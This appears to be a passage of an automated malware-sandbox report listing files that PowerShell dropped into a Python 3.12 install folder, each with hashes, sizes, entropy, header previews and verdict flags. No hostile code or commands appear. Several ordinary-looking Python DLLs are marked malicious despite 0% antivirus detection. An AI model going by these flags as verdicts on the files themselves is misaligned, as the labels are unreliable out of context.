                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\py.ico

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                              Category:dropped
                              Size (bytes):75809
                              Entropy (8bit):5.969322217946821
                              Encrypted:false
                              SSDEEP:
                              MD5:B35F68A3086562C4D5453FAAD5A3474E
                              SHA1:673904FF9B305A6600E47AD715289122EC0B046A
                              SHA-256:150C470F9943B806B44312EFDEC85755F22F8D7D52B31F93A9AF3C43E8627381
                              SHA-512:6EC80921942B3BD3C85EF24A2DE5454A34A3AD11A1BC69B601AEA7B873E318073C0B2D78C26685999F78EC64A86282C08C53AB8D77E41C661AE968EA52C08176
                              Malicious:false
                              Reputation:unknown
                              Preview:...............7......@@......(....8..00...........N.. ..........m]...............f..........h....l........ .t/..Er..@@.... .(B......00.... ..%...... .... ............... .....1......... .h....#...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..{.$.}....w........X..V.....F..]..T..P.H().........P)..<....Y..%%...[B2....2."..\......tOwO..9=.>}^=.5s.....==gz......;..;.T.x..0.3.x.....,.l..f.a..0......`..0.....a&.6..3...`......L0l..f.a..0......`..0.....a&.6..3........_.ro...Y:>.T...V...0c.......3v..X8..0c...56.....f,.t:..,.l....#......k8...l....G..1.u.6..n....5.......w.{...N..ND.\'P.......j...1.!.u+n..v|.._... ..>.....p.....}.v.y.h6...N...%`....[.l....F`.a.....og#....`..6.....f.`#.p..`..6.....fla#0...0c....q.m.9..{......3.\v.e....>}......."...p..w8E.l....`V..........H..l....e.]..~..Nm'....`V$.v..G?.Q...l...0+.6.v..0+.6.f..0+.6.z..0...].........q...O..`..L..w.v6......#....(...a..L.l....`&.6.)+~Y.........aY.{.r?..{.n.....{..F...o\QK.s..L47.p

                              C:\Users\user\Downloads\Python\Python312\DLLs\pyc.ico

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                              Category:dropped
                              Size (bytes):78396
                              Entropy (8bit):6.10453452748711
                              Encrypted:false
                              SSDEEP:
                              MD5:B1C9980131A3F20E344AA3AA2C8DEA49
                              SHA1:0FE02F0ED5E56BBE7E4E98B1DCA061ED17FBF5C7
                              SHA-256:FDA28A734788A3F175CB6AED4DAEB5F05F0E49F6A272CCD2051BA337F7B3B42F
                              SHA-512:84CA107ACE44FA1964C6C1EA93FC767BDE88363339FC426A3D660DA53C84BADE14F1FAE99C494483BF2B5312938D84B0C1733C85E82592B8FFE8A28F76186A3A
                              Malicious:false
                              Reputation:unknown
                              Preview:..............r?......@@......(...8@..00..........`V.. ...........e...............m..........h...xt........ ..1...y..@@.... .(B.....00.... ..%...... .... ............... .....L$........ .h....-...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y..W}..-.^....n.v.lK..@.../.,....`...s0g.@.0.d...8.@B&..9.'.@L....NX-..-.8v[.. ./-....zU..[..[.....w?...zU...[.-......=..#.h4..1./..h....4..F+......@..`...h:...4..F+......@..`...h:...4..F+......@..`...h:...4..F+.....O......x.9..:...t..lB{...B+..E+.M.....j%0Ah..i;,........m.....@.hO`.h..i{.'0v...=.ei%0F.. .C..M.+..<....w..d..~g&.j.*.y.uQ.T`Y..:....w.:.......y.t.BH.w.}.....v..#X.x1.....$0..F....8..<J.R.z8..Z.h....&...4m..'P.V3]..@6...........J ...4m.V...V...D+..A+.M.r.....j% F+.M[s.....Z...}.{Z.....=L.dI..9sF{....4......V.2.'....f.=....@3.h...t%...f.q...L^....Z.hf%.......3g:V.h....h%..V..Y.V.j....z.......#.J@.V...A+.$Z.h:...A,\.0.......t.........@3&fz..4.p..c....w.......\c.].g.....o...n....m.6.

                              C:\Users\user\Downloads\Python\Python312\DLLs\pyd.ico

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:MS Windows icon resource - 12 icons, 256x256 with PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced, 8 bits/pixel, 64x64, 8 bits/pixel
                              Category:dropped
                              Size (bytes):83351
                              Entropy (8bit):6.269678824341842
                              Encrypted:false
                              SSDEEP:
                              MD5:1A8230030D821CF8EA57CE03AAEAD737
                              SHA1:12656788B1FBE4D2375ECC2989A4D9DA69CAA0D6
                              SHA-256:C4EC1845A5724B2A83500F3BD940355E2FE26EFC6B4FE6C208365359A6130DA1
                              SHA-512:AF6356DC67249E724AE30F65DDEFB4E53C6F2703DA32FD5F135598BBD6189BEE70950242F52985478DE99979D1271EEC9F4E2981A29A9BC02C673E9B668FD0C1
                              Malicious:false
                              Reputation:unknown
                              Preview:...............H......@@......(....I..00..........._.. ..........hn...............w..........h....}........ ..;..@...@@.... .(B../...00.... ..%..W... .... ......&........ ......7........ .h.../A...PNG........IHDR.............\r.f....pHYs..........o.d.. .IDATx..y...u.....u..l3..+Ar...)B..-.c...Y....X.$[....r..c.;>I..>..(...X.m%..G... ..H.....F,..f....~.T..W.^U...Yz.}.S....5.|....S^z.%H$...7 .H..i.$.e.4...2F...d.#..D....@"Y.H. .,c...H.1..H$..i.$.e.4...2F...d.#..D....@"Y.H. .,c...........B.d~H....G>.,.},%d. i......H. i9../.R..&!....0.C..&!...%.F.9H. iY...=..HZ.i.f.4...G...i.:.8....-..9.m..y>.G.\...x...~......O."......0".#F@..$c...B>.l&M=...........qm?>.K..?...azz:.Zi..#...E...../..t:.{...$C..IK0.n...._FGGG....#...e.\7......@...@.Rl...../J#.$.....[6..'_.9.f ...%..@s..@..H`.H. ii.l.......5.._..W.....@.......D....F.B...@....@.d.F 9..H.....$.....@...u3>.S...vzz..........@.$yx..~.g...w..Y.F@...E..x...,i...F...G..p...,...=.....f......@.lx..'..~H...b....,+.~.I|.#?.t

                              C:\Users\user\Downloads\Python\Python312\DLLs\pyexpat.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):201496
                              Entropy (8bit):6.366374012034735
                              Encrypted:false
                              SSDEEP:
                              MD5:5E911CA0010D5C9DCE50C58B703E0D80
                              SHA1:89BE290BEBAB337417C41BAB06F43EFFB4799671
                              SHA-256:4779E19EE0F4F0BE953805EFA1174E127F6E91AD023BD33AC7127FEF35E9087B
                              SHA-512:E3F1DB80748333F08F79F735A457246E015C10B353E1A52ABE91ED9A69F7DE5EFA5F78A2ED209E97B16813CB74A87F8F0C63A5F44C8B59583851922F54A48CF5
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A~..A~..A~..H...M~..G...C~..G...L~..G...I~..G...B~......C~......B~..A~..5~......E~......@~....}.@~......@~..RichA~..........PE..d....K.f.........." ...&..................................................... ............`.............................................P...P...................T......../..........`4..T........................... 3..@............ ...............................text...O........................... ..`.rdata..$.... ......................@..@.data...l ..........................@....pdata..T...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\python_lib.cat

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):125220
                              Entropy (8bit):6.927830329526241
                              Encrypted:false
                              SSDEEP:
                              MD5:7E0751762AE08566F876556CC2B92C7E
                              SHA1:9FEC1FE8A03C2D5A8D911479EF6C3921189CB051
                              SHA-256:1B7CB35EAD7ACE3D87970E01F4D98BE2219CD558E4CF63B1C3F15CEA709F6AB0
                              SHA-512:72AF8FDB16EDD846EE67E1FF421E95C3335BE2DC2EC475DA586120B670E105EE9A43EB4666FE7837147C5A17B76C5DC55BC9B012A31C3D4991875B6C29B76CF2
                              Malicious:false
                              Reputation:unknown
                              Preview:0......*.H...........0.......1.0...`.H.e......0...q..+.....7......a0...\0...+.....7........Y...N....".P...240409150154Z0...+.....7.....0....0... .....w.=...7o.............L.w1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .....w.=...7o.............L.w0*...0..{b..M..;@....C^.1.0...+.....7...1...0*....T..|../..IT....Q.1.0...+.....7...1...0*.....'......s..%R=5..1.0...+.....7...1...0*.....2m..3.......N..D1.0...+.....7...1...0... .......V.C.........>..wf...O...1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .......V.C.........>..wf...O...0*.....KG{6.8.o.<v.....1.0...+.....7...1...0... .k.r.....r...K=.w.&.....mY+..1i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .k.r.....r...K=.w.&.....mY+..0... .l..x....h......=....'&.ZZGe.7.31i0...+.....7...1...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .l..x....h......=....'&.ZZGe.7.30*....H..J.%....Q..Uhx{;1.0...+.....7...1...0*.........].3.=].[.

                              C:\Users\user\Downloads\Python\Python312\DLLs\select.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):30488
                              Entropy (8bit):6.576230704358061
                              Encrypted:false
                              SSDEEP:
                              MD5:92B440CA45447EC33E884752E4C65B07
                              SHA1:5477E21BB511CC33C988140521A4F8C11A427BCC
                              SHA-256:680DF34FB908C49410AC5F68A8C05D92858ACD111E62D1194D15BDCE520BD6C3
                              SHA-512:40E60E1D1445592C5E8EB352A4052DB28B1739A29E16B884B0BA15917B058E66196988214CE473BA158704837B101A13195D5E48CB1DC2F07262DFECFE8D8191
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.tb..'b..'b..'k.V'`..'d(.&`..'d(.&n..'d(.&j..'d(.&f..'.(.&`..'b..' ..')..&g..'.(.&c..'.(.&c..'.(:'c..'.(.&c..'Richb..'........PE..d....K.f.........." ...&.....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...X....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\sqlite3.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):1540888
                              Entropy (8bit):6.584272141791991
                              Encrypted:false
                              SSDEEP:
                              MD5:612FC8A817C5FAA9CB5E89B0D4096216
                              SHA1:C8189CBB846F9A77F1AE67F3BD6B71B6363B9562
                              SHA-256:7DA1C4604FC97BA033830A2703D92BB6D10A9BBA201EC64D13D5CCBFECD57D49
                              SHA-512:8A4A751AF7611651D8D48A894C0D67EB67D5C22557BA4DDD298909DD4FB05F5D010FE785019AF06E6CA2E406753342C54668E9C4E976BAF758EE952834F8A237
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........l..l..l...B..l.....l.....l.....l.....l.....l..l..l.....l.....l......l.....l.Rich.l.................PE..d....K.f.........." ...&.....,............................................................`..............................................#...........`..........h....T.../...p..\......T...............................@............@..X............................text....,.......................... ..`.rdata.......@.......2..............@..@.data...PM...0...D..................@....pdata..h............\..............@..@.rsrc........`.......:..............@..@.reloc..\....p.......D..............@..B................................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\tcl86t.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):1816344
                              Entropy (8bit):6.495083998132025
                              Encrypted:false
                              SSDEEP:
                              MD5:21DC82DD9CC445F92E0172D961162222
                              SHA1:73BC20B509E1545B16324480D9620AE25364EBF1
                              SHA-256:C2966941F116FAB99F48AB9617196B43A5EE2FD94A8C70761BDA56CB334DAA03
                              SHA-512:3051A9D723FB7FC11F228E9F27BD2644AC5A0A95E7992D60C757240577B92FC31FA373987B338E6BC5707317D20089DF4B48D1B188225FF370AD2A68D5FF7BA6
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......1.y+u..xu..xu..x...yw..x...xv..x...yx..x...y}..x...yq..x..yw..x|..xg..x...yt..x...yx..xu..x]..x...y...x...yt..x...xt..x...yt..xRichu..x........................PE..d...1,.c.........." ...!..................................................................`..............................................`.. _..h.......8................/..........................................`...@............0...............................text............................... ..`.rdata..|L...0...N..................@..@.data...."...........f..............@....pdata...............n..............@..@.rsrc...8............f..............@..@.reloc...............j..............@..B................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\tk86t.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):1555736
                              Entropy (8bit):6.182100088642903
                              Encrypted:false
                              SSDEEP:
                              MD5:9FB68A0252E2B6CD99FD0CB6708C1606
                              SHA1:60AB372E8473FAD0F03801B6719BF5CCCFC2592E
                              SHA-256:C6FFE2238134478D8CB1C695D57E794516F3790E211FF519F551E335230DE7DE
                              SHA-512:F5DE1B1A9DC2D71AE27DFAA7B01E079E4970319B6424B44C47F86360FAF0B976ED49DAB6EE9F811E766A2684B647711E567CBAA6660F53BA82D724441C4DDD06
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.P.=n>.=n>.=n>...?.?n>...;.1n>...:.5n>...=.9n>...:.>n>...:.<n>.4...-n>...?.(n>.=n?.wo>...6..n>...>.<n>.....<n>...<.<n>.Rich=n>.................PE..d...],.c.........." ...!............|.....................................................`..........................................?..L@..,...|........{...P..D......../.......E...T...............................S..@...............@............................text...h........................... ..`.rdata..0...........................@..@.data...............................@....pdata..D....P......................@..@.rsrc....{.......|..................@..@.reloc...E.......F...H..............@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\unicodedata.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):1137944
                              Entropy (8bit):5.462087550450309
                              Encrypted:false
                              SSDEEP:
                              MD5:16BE9A6F941F1A2CB6B5FCA766309B2C
                              SHA1:17B23AE0E6A11D5B8159C748073E36A936F3316A
                              SHA-256:10FFD5207EEFF5A836B330B237D766365D746C30E01ABF0FD01F78548D1F1B04
                              SHA-512:64B7ECC58AE7CF128F03A0D5D5428AAA0D4AD4AE7E7D19BE0EA819BBBF99503836BFE4946DF8EE3AB8A92331FDD002AB9A9DE5146AF3E86FEF789CE46810796B
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........aM...#...#...#..x....#.."...#..&...#..'...#.. ...#..."...#..x"...#..."...#.......#...#...#......#...!...#.Rich..#.................PE..d....K.f.........." ...&.>..........\*.......................................p.......Q....`.........................................p...X............P.......@.........../...`......P^..T............................]..@............P..p............................text....=.......>.................. ..`.rdata..\....P.......B..............@..@.data........ ......................@....pdata.......@......................@..@.rsrc........P......."..............@..@.reloc.......`.......,..............@..B........................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\winsound.pyd

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):30488
                              Entropy (8bit):6.443672733968568
                              Encrypted:false
                              SSDEEP:
                              MD5:F4EFDE2CA920A52135B00BF8F0545A87
                              SHA1:352E5EA2419BA876FB80E0D0D1E5DD12272A33E4
                              SHA-256:9885B3D18903A2EF27428C7C9760493111CC97330FF0AFCB57199964092E86BF
                              SHA-512:F098AF2851BE213F83D19C0AA0CA82DED7BC41F51793502B9BED32D185B73B9CC8A9B29E25B3C5847B237AA466B14088E577F05B6BD03046AA65EDB25C087E8D
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N.J. TJ. TJ. TC.TH. TL.!UH. TL.%UA. TL.$UB. TL.#UI. T%.!UH. T..!UM. TJ.!Tp. T%.(UK. T%. UK. T%..TK. T%."UK. TRichJ. T........................PE..d....K.f.........." ...&.....4.......................................................!....`..........................................A..P....B.......p.......`..p....H.../......d....:..T............................9..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..d............F..............@..B................................................................................................................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\DLLs\zlib1.dll

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):146712
                              Entropy (8bit):6.609130019215802
                              Encrypted:false
                              SSDEEP:
                              MD5:297E845DD893E549146AE6826101E64F
                              SHA1:6C52876EA6EFB2BC8D630761752DF8C0A79542F1
                              SHA-256:837EFB838CB91428C8C0DFB65D5AF1E69823FF1594780EB8C8E9D78F7C4B2FC1
                              SHA-512:F6EFEF5E34BA13F1DFDDACFEA15F385DE91D310D73A6894CABB79C2186ACCC186C80CEF7405658D91517C3C10C66E1ACB93E8AD2450D4346F1AA85661B6074C3
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x.Oc..........."...'............P..........A....................................@.....`... ......................................@.......P..8......................../......................................(....................Q..p............................text...............................`..`.data...............................@....rdata...W.......X..................@..@.pdata..............................@..@.xdata....... ......................@..@.bss.........0...........................edata.......@......................@..@.idata..8....P......................@....CRT....X....`......................@....tls.........p......................@....rsrc...............................@....reloc..............................@..B................................................................................................................................

                              C:\Users\user\Downloads\Python\Python312\Doc\html\.buildinfo

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):234
                              Entropy (8bit):4.83687632821278
                              Encrypted:false
                              SSDEEP:
                              MD5:54949B2EA0EA5154FE0F9F9D2F5814DB
                              SHA1:B49EF38E5F36D1570EEC285B233086E868DCFA20
                              SHA-256:D33FB8AFE37163056EDF2ABF8C0C701ED104714320FA1BA993B5164BB70AA3E5
                              SHA-512:785E8239970710F146DF461D564887A587F23F265C25A269AA97A800084CFC7B484B89A53C3FD831CC8786D3DFCF7ACA814CBB30A39974C254FD763C44FEAD1B
                              Malicious:false
                              Reputation:unknown
                              Preview:# Sphinx build info version 1..# This file hashes the configuration used when building these files. When it is not found, a full rebuild will be done...config: 9a95930adb1ce197ae15cb4c41582c37..tags: 645f666f9bcd5a90fca523b33c5a78b7..

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_downloads\6dc1f3f4f0e6ca13cb42ddf4d6cbc8af\tzinfo_examples.py

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable, with CRLF line terminators
                              Category:dropped
                              Size (bytes):6036
                              Entropy (8bit):4.734990692234277
                              Encrypted:false
                              SSDEEP:
                              MD5:F161D3B3E8CA2C3D55D9B1DD97107FA2
                              SHA1:DB3F12B09E223787F8EFF264F820C1097DF7D099
                              SHA-256:DEFCCC58D87DBD6207906F80DEB9AD29ED15B0DF588CBFCB180D6B9369E5F8B0
                              SHA-512:17F14EF1D696F89BFD8F814F88014CE4FC6FCCA904450D2466D9D830CE74599F761AA6374D27E2DB9A2A2FFBB6A38DB5291685B68D7A65901B13AF5767843366
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Reputation:unknown
                              Preview:from datetime import tzinfo, timedelta, datetime....ZERO = timedelta(0)..HOUR = timedelta(hours=1)..SECOND = timedelta(seconds=1)....# A class capturing the platform's idea of local time...# (May result in wrong values on historical times in..# timezones where UTC offset and/or the DST rules had..# changed in the past.)..import time as _time....STDOFFSET = timedelta(seconds = -_time.timezone)..if _time.daylight:.. DSTOFFSET = timedelta(seconds = -_time.altzone)..else:.. DSTOFFSET = STDOFFSET....DSTDIFF = DSTOFFSET - STDOFFSET....class LocalTimezone(tzinfo):.... def fromutc(self, dt):.. assert dt.tzinfo is self.. stamp = (dt - datetime(1970, 1, 1, tzinfo=self)) // SECOND.. args = _time.localtime(stamp)[:6].. dst_diff = DSTDIFF // SECOND.. # Detect fold.. fold = (args == _time.localtime(stamp - dst_diff)).. return datetime(*args, microsecond=dt.microsecond,.. tzinfo=self, fold=fold).... def utcoffset(se

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_images\hashlib-blake2-tree.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 500 x 320, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):11070
                              Entropy (8bit):7.946023445243204
                              Encrypted:false
                              SSDEEP:
                              MD5:A31E9697FC75139B17480D716A80ABA4
                              SHA1:F94BF8128D57C0610A6ACD69AD4D56F839EDA01F
                              SHA-256:382828D64E88644E47E695D717EA8432EC1EF79A17F2D209B11AEF4FDBFA4BF5
                              SHA-512:A592706045236F3ED27D38C5DDF40BD087428DFC158C5E531CB00EF7AAC9C2F7F78CFCE870F0C8971D71AF129D5FB716D6BE2C1B28CD69282F048A34D1B38643
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR.......@.....}S~.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...mPLTE.............:}.......k........j.&q.................................................{......................................t............................................b..?o.4d.<k.X.................8h.Ar.6f..................T..>m.Dt.U.....5e............:k.h..p..r..e..\..Iy........................3d.Dx.........{....a..w..r..t..o....Y..`spwr..ZkK,P.)M.,G7.3.t..@V.w)V..[.y.e@yfoVGv.c..&^.v~.u|.......mpf...*Pn3:8qrppjmtx~4H,3f.ZR.`....k|y.GesFl.....Ms.:0BA@...... !WbV...............hj`.J.s..^S.HI%Mfb7f...........YGx...u..i..~...v..~.W...1X.\....joJ.W2H...&@.......T....5].......6\.(F.....su.....bKGD....H....tIME.........,...'.IDATx.._......XG....X..)/.(..nq.......@.h=.V$..-...t.Bk.R ..|i.....{.....s_.....d.B2Q..$..|:].kMf.w.~.5k(J....T`k.V.V..gP.z.Q_...)B=.gnxk...b..7lP..',W.G_...6....+E=s....wBt......N...u..U..........;!...wW..'DW 2#@'...lP

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_images\kde_example.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 2832 x 1851, 8-bit/color RGBA, non-interlaced
                              Category:dropped
                              Size (bytes):315150
                              Entropy (8bit):7.563998966428142
                              Encrypted:false
                              SSDEEP:
                              MD5:1FC09C1924C3A39F4937B62D8CA139B4
                              SHA1:D30ABCDBCE8FC51828AB627CDC5E9E1E1DAC9B87
                              SHA-256:B669BED8B4B1D4672F6772C0B63C2C70678DD330C4E7DB576C55BCB319B8865B
                              SHA-512:D486EC9061D1647111362142B8CF3F00F7F496B136497C2203155CBEFE874ABB1A32633C29630F5C65F2F17921C864C626E0A4E7BD223DD36B440864D2EDD895
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR.......;........^....sRGB.........eXIfMM.*.............................J...........R.(...........i.........Z.......J.......J.........................................;....'}......pHYs..2...2..(dZ...@.IDATx......U....";..*..(......".....E.L.D..'.&:b&&:f..i..U.E\p..D.Pqc.d_d.Y.>....U..nq.-x...{.*...G..-.|W.6..P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@....c.6.......m;=....P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P...\.t...w.....iA.../..Tla_W@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@.V/..w.._.>|......{...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P.n...x..}.F....~.7.z...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P...|...G..it4...%r...P@...P@...P@...P@...P@...P@...P@...P@...P@...P@..Z.........m.....P@...P@...P@...P@...P@...P@...P@...P@...P@...P@...P.V...k%i?.(....(....(....(....(....(....(....(....(....(........:8H.Q...P@

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_images\logging_flow.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 955 x 758, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):21907
                              Entropy (8bit):7.912374033687615
                              Encrypted:false
                              SSDEEP:
                              MD5:D69005A3C3EE464C7C68E7BCF5012682
                              SHA1:2B17E0E96AACCF6722EF75281663BB715BA9ADAF
                              SHA-256:70D752F336A9EE7AF4A56B8E5B3696B962B69793B274F76439165823C69CF5E0
                              SHA-512:178DA406781A067DEB6DB01CA87886CF5981A528DEF019F8EDABB8372D44FA1E31CC8F410ACB586529A877400F9F3D59427789E4F61615FF87411FE074258DC7
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR...............q.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....PLTE..........@@@ppp......... ...............XXX..........................<<<QQQ%%%...ttt...ccc.......................P..Y..QQ1<<$...s...%%.ttF..z.....b..jcc;.......................???...PPP000888...HHH......(((......hhhxxx```............wwwAAA]]]***...NNN{{{......:::...---RRR...>>>...TTTGGG............kkk&&&zzz...ooo...!!!111.........222eee...SSS===......___......$$$.........CCC444..."""[[[sss'''........bKGD....H....tIME.........M...R.IDATx....#K.....[...uW.Z......E.y.ln.~}....3{8.r.. .$.............%.......|>[{.*..V...ZUk.@.[........e.....`.. .v...w.....]..:".d.j.....mwv..7...}N5]''..T[t...].]...w....F|c.Kv..oj~M.KvyS.T..g.Nv....O.K....q..k....w...]....d.....$.d.75.g..1..Z.+..M.W...k{.....&....\.3..kn).a.j.h.E...`.H....M.k..fn..b..P=.].Kvk..4..E..m....sd.{...F"...:'.N$vp..EcT....8..H4:.Z/").X.X.D.f...uZ....3...i..u9.r.AP...'...*...r..<...>aWCx;...|y.....w&

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_images\pathlib-inheritance.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:PNG image data, 538 x 319, 8-bit colormap, non-interlaced
                              Category:dropped
                              Size (bytes):6431
                              Entropy (8bit):7.725801858557267
                              Encrypted:false
                              SSDEEP:
                              MD5:E422B7E296E99FD5875644DA110F0ECE
                              SHA1:57C6717DA7EA3D0CCD93765FD7B26A0FC1E81007
                              SHA-256:4BD5DB0B21F178FD8B16F7D999D0DA20A00CA8D271CD556CFB1D26DEA91AAC88
                              SHA-512:84FB37C554F9F8801040E6729DB269060C067A0669F561D68852B316521F2F9A699A6CF3F219E51566318AB55FC0E46A2BE3A1D70129AC291C2165C288843BD0
                              Malicious:false
                              Reputation:unknown
                              Preview:.PNG........IHDR.......?.....7.....[PLTE..................................................................................................................................................................................................................'''................................................>>>....................."""......................................................,,,........................222............................................................ $$$(((,,,000444888<<<@@@DDDHHHLLLPPPTTTXXX\\\```dddhhhlllppptttxxx|||...................................................................................................f..%....tRNS......... $'(,048<@CGKOSW[_acdghjkoqstw{................................................................................................./].....IDATx.......A.q...B.6M.|!.V.$m.k..4m.-..t..H.A.l.6.y,..c0x...l.......%.Y......,~....8..H......H.....s....RJ)..RJ)..RJ)..RJ)..RJ)..RJ)..RJ)..RJ)..RJ)..RJ.u.zc...y^%...nk...h..h..h..h(.P..DC..

                              C:\Users\user\Downloads\Python\Python312\Doc\html\_images\tk_msg.png

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
